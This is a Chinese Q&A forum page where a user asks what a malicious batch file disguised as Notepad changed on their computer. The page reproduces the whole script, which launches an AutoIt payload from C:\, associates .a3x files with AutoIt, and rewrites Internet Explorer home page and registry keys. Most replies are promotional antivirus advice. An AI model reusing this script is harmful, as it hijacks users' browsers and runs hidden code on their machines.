病毒-点击运行了伪装成记事本的Rea.BAT批处理文件
@echooffstartiexplore.exe(代替)"%~dp0AutoIt3.exe"c:\move"%~dp01.a3x"c:\assoc.a3x=a3xfty...
@echo offstart iexplore.exe (代替) "%~dp0AutoIt3.exe" c:\move "%~dp01.a3x" c:\assoc .a3x=a3xftype a3x=c:\AutoIt3.exe %%1start c:\1.a3xreg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d (代替) /freg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d (代替)/?un_427546_16489 /f reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe (代替)/?un_427546_16489" /freg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "00000000" /f Regini.exe c:\windows\Regini.ini /fexit这个文件都修改了什么?我的IE主页被修改了,好像还安装了一个日历程序,还有什么其它的被修改了吗?
(代替):此处代替WangZhi 展开
(代替):此处代替WangZhi 展开
3个回答
展开全部
您好
这是篡改您的注册表主页、桌面的一个批处理
您可以到腾讯电脑管家官网下载电脑管家
然后使用电脑管家——杀毒——全盘查杀,电脑管家独有管家系统修复引擎,可以帮您检测出注册表异常,然后及时帮您修复的。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
腾讯电脑管家企业平台:http://zhidao.baidu.com/c/guanjia/
更多追问追答
追问
我发现C盘根目录下被复制了两个文件,一个是“.exe”一个是未知扩展名,是从“TEMP”隐藏文件夹中复制出来的,我可以把压缩包文件传给你吗?你帮我详细的看一下。
追答
您要无法判定的话 直接使用电脑管家右击扫描就可以了
TEMP是系统存放临时文件的文件夹
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
上海国想
2024-12-02 广告
2024-12-02 广告
感染勒索病毒后,恢复数据可能比较困难,但并非完全不可能。以下是一些建议的恢复步骤:1. 立即断开网络:防止病毒进一步传播。2. 备份数据:如果尚未备份,请尽快进行,以防恢复过程中数据进一步丢失。3. 使用杀毒软件:在安全模式下启动,进行全面...
点击进入详情页
本回答由上海国想提供
展开全部
愿我的答案 能够解决您的烦忧
批处理吧应该,赶紧杀毒就是了,特别简单
下载腾讯电脑管家“8.8”最新版,对电脑首先进行一个体检,打开所有防火墙避免系统其余文件被感染。
打开杀毒页面开始查杀,切记要打开小红伞引擎。
如果普通查杀不能解决问题,您可以打开腾讯电脑管家---杀毒——全盘杀毒- 进行深度
扫描。
查杀处理完所有病毒后,立刻重启电脑,再进行一次安全体检,清除多余系统缓存文件,避免二次感染。
如果您对我的答案不满意,可以继续追问或者提出宝贵意见,谢谢
批处理吧应该,赶紧杀毒就是了,特别简单
下载腾讯电脑管家“8.8”最新版,对电脑首先进行一个体检,打开所有防火墙避免系统其余文件被感染。
打开杀毒页面开始查杀,切记要打开小红伞引擎。
如果普通查杀不能解决问题,您可以打开腾讯电脑管家---杀毒——全盘杀毒- 进行深度
扫描。
查杀处理完所有病毒后,立刻重启电脑,再进行一次安全体检,清除多余系统缓存文件,避免二次感染。
如果您对我的答案不满意,可以继续追问或者提出宝贵意见,谢谢
追问
卡巴、360,都杀过没有查到病毒,主要是IE被修改了
这个是原文地址:
http://zhidao.baidu.com/question/1818018982144994948.html?quesup2&oldq=1
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
Regini.exe c:\windows\Regini.ini
修改了Regini.ini里面内容
修改了Regini.ini里面内容
追问
我没有在此路径下找到Regini.ini文件,只找到了Regini.exe文件,再者,昨天我发现C盘根目录下被复制了两个文件,一个是“.exe”一个是未知扩展名,是从“TEMP”隐藏文件夹中复制出来的,我可以把压缩包文件传给你吗?你帮我详细的看一下。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询